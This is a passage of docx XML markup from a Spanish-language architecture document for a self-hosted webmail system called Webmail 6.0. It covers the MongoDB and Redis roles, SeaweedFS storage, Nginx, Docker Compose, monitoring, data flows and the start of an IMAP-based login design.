          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Redis 7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Justificación conjunta</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Metadata de email</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Documentos</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">emails</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">con índices ESR</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">No aplica</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Índice compuesto</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">{mailbox, date, uid}</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">para queries de inbox</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">[204]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Full-text search</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Atlas Search (Lucene integrado)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">No aplica</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Elimina Elasticsearch; cubre 90% de casos</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">[132]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Sesiones de usuario</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">No aplica</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">SETEX</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">con TTL 7d</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Invalidación distribuida + rotación tokens</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">[157]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Caché de cuerpos</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">No aplica</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Cache-Aside, TTL 1h</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Reduce fetchs IMAP repetidos</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">[152]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Notificaciones push</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">No aplica</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Pub/Sub a WebSocket servers</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Fire-and-forget; &lt;100ms latencia</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">[139]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Rate limiting</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">No aplica</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Sliding Window ZSET</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Precisión sin boundary bursts</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">[156]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Background jobs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Estado de jobs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">BullMQ 5 colas + workers</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Retry exponencial, dead letter, tracing</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">[203]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La tabla sintetiza la división de responsabilidades entre MongoDB y Redis. MongoDB actúa como fuente de verdad duradera para metadata de email y búsqueda; Redis como capa de velocidad para sesiones, caché, mensajería en tiempo real y orquestación de trabajos asíncronos. Esta separación es la configuración estándar de la industria para aplicaciones read-heavy como el email, donde la ratio de lecturas a escritiones supera 100:1 en inboxes típicos.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="55"/>
    <w:bookmarkStart w:id="56" w:name="seaweedfs-alternativa-minio"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.3.3 SeaweedFS (alternativa MinIO)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Para almacenamiento de objetos (adjuntos de email, avatares de contactos, exports), SeaweedFS reemplaza a MinIO como opción por defecto. MinIO, tradicionalmente la opción más madura para object storage S3-compatible, tuvo su comunidad edition archivada en febrero de 2026 —el repositorio de GitHub es ahora read-only— y su licencia AGPL-3.0 genera riesgo legal para uso comercial sin licencia pagada</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[177]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[179]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. SeaweedFS (licencia Apache 2.0) ofrece I/O muy alto y está especializado en el manejo de muchos archivos pequeños —exactamente el perfil de adjuntos de email, donde la mayoría de archivos son &lt;5 MB</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[177]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Garage (Rust, optimizado para deployments distribuidos/edge) se mantiene como alternativa documentada para instalaciones edge o multi-región.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="56"/>
    <w:bookmarkEnd w:id="57"/>
    <w:bookmarkStart w:id="61" w:name="infraestructura"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.4 Infraestructura</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="58" w:name="nginx-reverse-proxy"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.4.1 Nginx reverse proxy</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Nginx 1.26 actúa como reverse proxy y terminador SSL/TLS. Su configuración incluye: upstream hacia el servidor Fastify (port 3000), servicio de archivos estáticos del frontend (build de Vite), compresión gzip/brotli para assets JavaScript y CSS, headers de seguridad (HSTS, X-Frame-Options, X-Content-Type-Options, CSP estricto), y rate limiting por IP a nivel de conexión (complementario al rate limiting de aplicación en Redis). Para conexiones WebSocket de notificaciones en tiempo real, Nginx configura</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">proxy_upgrade</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">y</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">proxy_connection</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">upgrade, manteniendo conexiones persistentes entre clientes y servidores Node.js.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="58"/>
    <w:bookmarkStart w:id="59" w:name="docker-docker-compose"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.4.2 Docker + Docker Compose</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">El despliegue primario es Docker Compose multi-service. El archivo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">docker-compose.yml</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">define los servicios:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">web</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(Nginx + assets estáticos),</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">api</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(Fastify + Node.js 20),</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">worker</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(procesos BullMQ),</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">mongo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(MongoDB 7),</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">redis</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(Redis 7), y</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">seaweedfs</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(almacén de objetos). Cada servicio incluye health checks, restart policies (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">unless-stopped</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), y límites de recursos (CPU/memoria). La imagen del servicio</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">api</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">utiliza multi-stage build: stage de build (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">node:20-alpine</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">+ dependencias +</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">npm run build</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) y stage de producción (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">node:20-alpine</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">+ solo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">node_modules</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">de producción + código compilado), reduciendo la imagen final a ~180 MB.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La elección de Docker Compose sobre Kubernetes es deliberada. Para el segmento objetivo de Webmail 6.0 —individuos, pequeñas organizaciones y hosting providers que necesitan un webmail funcional sin equipo de DevOps dedicado— Kubernetes añade complejidad operacional no justificada. Docker Compose con health checks, rotación de logs y gestión de secrets mediante variables de entorno proporciona una solución de despliegue completa. Kubernetes se documenta como alternativa para deployments enterprise, con manifiestos opcionales.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="59"/>
    <w:bookmarkStart w:id="60" w:name="prometheus-grafana"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.4.3 Prometheus + Grafana</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">El stack de observabilidad comprende Prometheus 2.53 para recolección de métricas y Grafana 11 para visualización. Prometheus scrapea endpoints</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/metrics</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">expuestos por la aplicación Fastify (vía</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">@fastify/metrics</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), BullMQ (métricas de cola: jobs procesados, fallidos, en espera), y los exporters de MongoDB y Redis. Los dashboards de Grafana incluyen: throughput de API (requests/minuto, latencia p50/p95/p99), estado de conexiones IMAP (activas, en IDLE, reconexiones), profundidad de colas BullMQ, hit rate de caché Redis, y uso de almacenamiento de SeaweedFS. Las alertas configuradas (vía Alertmanager) disparan notificaciones cuando la latencia p95 del API supera 500ms, cuando la profundidad de una cola BullMQ excede 1.000 jobs, o cuando el ratio de errores de conexión IMAP supera el 5% en una ventana de 5 minutos.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="60"/>
    <w:bookmarkEnd w:id="61"/>
    <w:bookmarkEnd w:id="62"/>
    <w:bookmarkStart w:id="78" w:name="arquitectura-de-sistema"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4. Arquitectura de Sistema</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La arquitectura de Webmail 6.0 se fundamenta en un patrón de Backend-for-Frontend (BFF) con cinco pilares tecnológicos: una SPA en Vue 3 como capa de presentación, Nginx como proxy inverso y servidor de estáticos, Fastify como runtime del API, MongoDB como sistema de registro principal con Redis para caché y sesiones, y SeaweedFS como almacén de objetos para adjuntos. El diseño prioriza la separación de responsabilidades entre la indexación local de headers (operaciones rápidas sobre MongoDB) y la obtención bajo demanda de cuerpos de email vía IMAP, un patrón que la investigación identificó como crítico para alcanzar tiempos de carga sub-segundo en buzones grandes</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[70]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[75]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. La decisión de adoptar Fastify sobre Express se fundamenta en benchmarks controlados que muestran un rendimiento 2-3x superior: aproximadamente 14,460 req/s frente a 6,150 req/s bajo 100 conexiones concurrentes durante 10 segundos</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[130]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Adicionalmente, el sistema de plugins de Fastify proporciona encapsulación nativa — cada plugin opera con su propio scope, evitando que decoradores y middlewares se filtren entre rutas — lo cual resulta particularmente valioso para aislar los módulos de IMAP, SMTP, CalDAV y WebSocket</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[128]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="63" w:name="diagrama-de-arquitectura"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.1 Diagrama de Arquitectura</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La topología del sistema sigue un flujo unidireccional de peticiones desde el navegador hasta los servicios externos, con canales paralelos para notificaciones en tiempo real y procesamiento en segundo plano. El siguiente diagrama describe la interacción completa entre componentes:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">El diagrama revela una decisión arquitectónica intencional: MongoDB actúa exclusivamente como índice local de headers y metadata, mientras que los cuerpos de email permanecen en el servidor IMAP hasta que el usuario solicita su lectura. Esta estrategia</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">headers-first, body-on-demand</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">reduce drásticamente el ancho de banda necesario para la sincronización inicial y permite que la lista de mensajes se sirva enteramente desde la base de datos local en tiempos de respuesta inferiores a 100ms</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[70]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[75]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. El uso de BODY.PEEK en lugar de BODY para el fetch de headers evita marcar implícitamente los mensajes como \Seen, preservando el estado de lectura del usuario hasta que interactúa explícitamente con un email</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[70]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[78]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="63"/>
    <w:bookmarkStart w:id="70" w:name="flujos-de-datos-principales"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.2 Flujos de Datos Principales</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cada operación crítica del webmail sigue un pipeline definido que equilibra latencia percibida, uso de ancho de banda y consistencia de datos. A continuación se detallan los seis flujos fundamentales.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="64" w:name="Xfb787919f68866f6612923cca7765e156fbfa30"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.2.1 Login: Validación IMAP → JWT + Credenciales Encriptadas → Conexión IMAP en Pool</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">El flujo de autenticación implementa el patrón BFF (Backend-for-Frontend) con token rotation, considerado el estándar para aplicaciones web en 2026</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[157]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[160]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. El proceso consta de cinco etapas:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Validación de credenciales contra IMAP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: El frontend envía email y password al endpoint POST /api/auth/login. Fastify intenta una conexión IMAP transitoria usando imapflow con los parámetros del servidor configurado. Si la conexión IMAP es exitosa, las credenciales se consideran válidas. Esta decisión — validar contra el servidor IMAP real en lugar de mantener una tabla local de passwords — elimina la necesidad de sincronización de credenciales y garantiza que el usuario siempre tenga acceso activo a su cuenta de correo.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Encriptación de credenciales</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: El password se encripta con AES-256-GCM usando una clave maestra derivada de</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
